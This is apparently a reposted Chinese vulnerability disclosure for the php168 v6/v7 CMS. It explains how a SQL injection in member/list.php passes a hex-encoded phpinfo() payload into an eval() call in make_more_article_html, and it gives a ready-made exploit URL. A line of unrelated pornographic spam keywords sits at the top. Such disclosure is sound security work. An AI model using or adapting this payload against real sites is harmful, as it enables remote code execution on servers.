亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

php168 v6/v7雞肋Getshell安全問題

  發(fā)布時(shí)間:2011-03-11 12:11:07   作者:佚名   我要評(píng)論
  剛搜了一下貌似和以前一個(gè)漏洞是一個(gè)問題。有點(diǎn)雞肋,需要條件:   1.網(wǎng)站配置為:文章生成真靜態(tài)   2.允許注冊(cè)會(huì)員   給出v6的測(cè)試代碼,提交后執(zhí)行phpinfo(),v7原理一樣,只是數(shù)據(jù)庫字段數(shù)不一樣。   member/list.php?step=2&Type=delete&aidDB[

  剛搜了一下貌似和以前一個(gè)漏洞是一個(gè)問題。有點(diǎn)雞肋,需要條件:

  1.網(wǎng)站配置為:文章生成真靜態(tài)

  2.允許注冊(cè)會(huì)員

  給出v6的測(cè)試代碼,提交后執(zhí)行phpinfo(),v7原理一樣,只是數(shù)據(jù)庫字段數(shù)不一樣。

  member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23

  0x01 漏洞在make_more_article_html這個(gè)函數(shù):

  function make_more_article_html($comebackurl='/',$type='',$aidDB=''){

  global $db,$pre,$webdb,$webdb,$showHtml_Type;

  if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml] 真靜態(tài)

  { return ;}

  ...

  $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");

  while($rs = $db->fetch_array($query)){

  ...

  $filename_b=$rs[bencandy_html];

  ...

  eval("\$showurl=\"$filename_b\";");

  ...

  0x02 在 \member\list.php中調(diào)用了該漏洞函數(shù):

  if($step==2){

  ...

  if($Type=='delete'){

  make_more_article_html("$FROMURL","del_0",$aidDB);

  by: k4shifz[w.s.t]

相關(guān)文章

最新評(píng)論